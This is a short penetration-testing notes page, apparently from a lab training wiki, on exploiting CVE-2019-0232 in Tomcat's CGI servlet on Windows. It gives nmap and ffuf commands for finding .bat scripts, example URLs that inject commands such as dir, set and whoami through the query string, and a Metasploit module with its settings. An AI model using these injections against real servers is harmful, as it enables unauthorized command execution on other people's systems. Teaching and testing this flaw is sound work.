Tomcat CGI

CVE-2019-0232 is a critical security issue that could result in remote code execution. This vulnerability affects Windows systems that have the enableCmdLineArguments feature enabled. An attacker can exploit this vulnerability by exploiting a command injection flaw resulting from a Tomcat CGI Servlet input validation error, thus allowing them to execute arbitrary commands on the affected system. Versions 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 of Tomcat are affected.

Enumeration

nmap -p- -sC -Pn 10.129.204.227 --open

Finding a CGI script

Browse to /cgi default directory and fuzz for valid .cmd or .bat

Browsing directly to the /cgi directory will return Not found (404). You really need to find a valid CGI script in order to execute get a 200 HTTP code and try to execute commands.

ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat

Attacking CGI script

If we find a valid CGI script, we can try to execute a command as shown on the following example

 http://10.129.204.227:8080/cgi/welcome.bat?&dir
 http://10.129.204.227:8080/cgi/welcome.bat?&set
 http://10.129.204.227:8080/cgi/welcome.bat?&c:\windows\system32\whoami.exe
 http://10.129.204.227:8080/cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.e

Metasploit module

exploit(windows/http/tomcat_cgi_cmdlineargs

You first need to identify a CGI directory and a .cgi script. Once you are sure that the target is vulnerable, you can use this module with option set ForceExploit true

PreviousCGI Applications - Shellshock NextCustomer Service Mgmt & Configuration Management

Last updated 12 hours ago